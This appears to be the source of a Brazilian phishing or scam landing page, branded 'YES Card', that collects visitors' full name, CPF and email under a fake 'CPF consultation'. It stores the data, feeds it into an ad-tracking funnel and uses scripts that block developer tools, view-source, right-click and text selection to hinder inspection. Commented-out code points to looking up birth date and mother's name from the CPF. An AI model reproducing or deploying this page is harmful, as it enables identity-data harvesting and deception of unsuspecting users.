<!DOCTYPE html><html lang="pt-BR"><head>
<script 
        src="https://cdn.xtracky.com/scripts/utm-handler.js"
        data-token="c701abaa-8cb3-4db2-b759-ea3a9b546358"
        data-click-id-param="click_id">
</script>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Consulta de CPF</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">

    <style>
      body {
        font-family: "Poppins", sans-serif;
        background-color: #f9f9f9;
        color: #333;
        margin: 0;
        padding: 0;
        display: flex;
        flex-direction: column;
        min-height: 100vh;
      }

      .header {
        background-color: #ffffff;
        padding: 20px;
        text-align: center;
        background: linear-gradient(147deg, #003675 0%, #0d64fb 74%);
      }

      .header img {
        width: 150px;
      }

      .main-content {
        max-width: 500px;
        background: #fff;
        margin: 50px auto;
        padding: 30px;
        border-radius: 10px;
        box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
      }

      .btn-custom {
        color: rgb(255, 255, 255);
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #0d64fb;
        font-weight: 600;
        border-radius: 1rem;
        padding: 0.75rem 3rem;
        letter-spacing: 0.3px;
        line-height: 1.15;
      }

      .btn-custom:hover {
        color: white !important;
        background-color: #000 !important;
        transform: scale(1.02) !important;
      }

      .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
        margin-top: auto;
      }

      .result-box {
        margin-top: 20px;
        background-color: #f9f9f9;
        border: 1px solid #e6e6e6;
        border-radius: 8px;
        padding: 15px;
        display: none;
        text-align: left;
      }

      .result-box p {
        margin: 0 0 10px;
      }

      .loader {
        display: none;
        text-align: center;
        margin-bottom: 15px;
      }

      .loader img {
        width: 50px;
        height: 50px;
      }

      .success-message {
        text-align: center;
        font-weight: bold;
        color: green;
        margin-bottom: 15px;
      }

      .success-message img {
        width: 50px;
        height: 50px;
        display: block;
        margin: 0 auto 10px;
      }
    </style>
  <script async="" defer="" src="js/pixel_1.js"></script><script async="" defer="" src="js/pixel.js"></script></head>
  <body style="user-select: none;">
    
    <!-- Header -->
    <div class="header">
      <img src="images/logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
      <p style="color: gray; text-align: initial">
        Preencha o seus dados para cadastro
      </p>
      <form id="cadastroForm" style="text-align: initial">
        <div class="mb-3">
          <label for="name" class="form-label" style="color: gray; font-size: 13px">Nome Completo</label>
          <input type="text" class="form-control" id="name" style="border: 1px solid #e6e6e6; border-radius: 10px">
        </div>
        <div class="mb-3">
          <label for="cpf" class="form-label" style="color: gray; font-size: 13px">CPF</label>
          <input type="text" class="form-control" id="cpf" placeholder="000.000.000-00" style="border: 1px solid #e6e6e6; border-radius: 10px">
        </div>
        <div class="mb-3">
          <label for="email" class="form-label" style="color: gray; font-size: 13px">E-mail</label>
          <input type="text" class="form-control" id="email" style="border: 1px solid #e6e6e6; border-radius: 10px">
        </div>
      </form>
      <button id="consultarBtn" class="btn-custom" onclick="submitLog()">
        Consultar CPF
      </button>
      <div id="loader" class="loader">
        <img src="images/21-18-05-265_512.gif" alt="Carregando...">
        <p>Consultando seus dados...</p>
      </div>

      <!-- Resultado -->
      <div id="resultBox" class="result-box">
        <div class="success-message">
          <p>Dados cadastrados com sucesso!</p>
        </div>
        <p>
          Iniciando cadastro de <strong><span id="nomeCompleto"></span></strong>
        </p>
        <p>
          <!-- <strong>Data de Nascimento:</strong> <span id="dataNascimento"></span> -->
        </p>
        <!-- <p><strong>Nome da Mãe:</strong> <span id="nomeMae"></span></p> -->
        <!-- <p><strong>Sexo:</strong> <span id="sexo"></span></p> -->

        <p><strong>E-mail:</strong> <span id="emailCompleto"></span></p>
        <p><strong>CPF:</strong> <span id="cpfcompleto"></span></p>
        <button class="btn-custom" onclick="PassarUTMS()">Continuar</button>
      </div>
    </div>

    <!-- Script -->
    <script>
      function validaCPF(strCPF) {
        let Soma = 0;
        let Resto;
        if (strCPF == "00000000000") return false;

        for (let i = 1; i <= 9; i++)
          Soma += parseInt(strCPF.substring(i - 1, i)) * (11 - i);
        Resto = (Soma * 10) % 11;

        if (Resto == 10 || Resto == 11) Resto = 0;
        if (Resto != parseInt(strCPF.substring(9, 10))) return false;

        Soma = 0;
        for (let i = 1; i <= 10; i++)
          Soma += parseInt(strCPF.substring(i - 1, i)) * (12 - i);
        Resto = (Soma * 10) % 11;

        if (Resto == 10 || Resto == 11) Resto = 0;
        if (Resto != parseInt(strCPF.substring(10, 11))) return false;
        return true;
      }

      async function submitLog() {
        const cpf = document
          .getElementById("cpf")
          .value.replace(/-/g, "")
          .replace(/\./g, "");
        const loader = document.getElementById("loader");
        const resultBox = document.getElementById("resultBox");
        const consultarBtn = document.getElementById("consultarBtn");
        const email = document.getElementById("email").value;

        if (!validaCPF(cpf)) {
          alert("CPF inválido!");
          return;
        }

        loader.style.display = "block";
        consultarBtn.style.display = "none";
        resultBox.style.display = "none";

        // const responseCPF = await getCPF(cpf);
        // console.log("🚀 ~ submitLog ~ responseCPF:", responseCPF);]
        const nomeCompleto = document.getElementById("name").value;

        // const date = new Date(responseCPF.DADOS.NASC);
        // const formattedDate =
        //   ("0" + date.getDate()).slice(-2) +
        //   "/" +
        //   ("0" + (date.getMonth() + 1)).slice(-2) +
        //   "/" +
        //   date.getFullYear();
        // document.getElementById("dataNascimento").innerText = formattedDate;
        // const nomeMae = responseCPF.DADOS.NOME_MAE || "Não encontrado";
        // const sexo = responseCPF.DADOS.SEXO || "Não encontrado";
        document.getElementById("nomeCompleto").innerText = nomeCompleto;
        // document.getElementById("nomeMae").innerText = nomeMae;
        // document.getElementById("sexo").innerText = sexo;
        document.getElementById("emailCompleto").innerText = email;

        document.getElementById("cpfcompleto").innerText = cpf;

        // Salvar os dados no localStorage
        localStorage.setItem(
          "dadosCPF",
          JSON.stringify({
            nomeCompleto,
            // dataNascimento: formattedDate,
            // nomeMae,
            // sexo,
            cpf,
            email,
          })
        );

        loader.style.display = "none";
        resultBox.style.display = "block";
      }
    </script>

    <script>
      function PassarUTMS() {
        window.location.href='../card/index.html' + window.location.search
      }
    </script>

    <!-- Footer -->
    <div class="footer">
      Copyright © 2025 BlueBird. Todos os direitos reservados.<br>

      Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa
      do Site
    </div>
    <!-- Utmify utms capture -->
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
    
    <!-- Utmify pixel -->
    <script>
      window.pixelId = "66bb763debbcebab27d68442";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script>
    <!-- Utmify end -->
    
      <script>
    // Impedir a tecla F12 (abre as ferramentas de desenvolvedor)
    document.addEventListener('keydown', function(e) {
        if (e.keyCode === 123) {  // F12
            e.preventDefault();
        }

        // Impedir Ctrl + Shift + I (Ferramentas de desenvolvedor)
        if (e.ctrlKey && e.shiftKey && e.keyCode === 73) {
            e.preventDefault();
        }

        // Impedir Ctrl + U (exibir código fonte)
        if (e.ctrlKey && e.keyCode === 85) {
            e.preventDefault();
        }
    });

    // Impedir o menu de contexto (botão direito)
    document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
    });
</script>

<script>
    // Impedir a seleção de texto em toda a página
    document.addEventListener('selectstart', function(e) {
        e.preventDefault();
    });

    // Também bloqueia a seleção via CSS
    document.body.style.userSelect = 'none';  // Para navegadores modernos
</script>
  

</body></html>
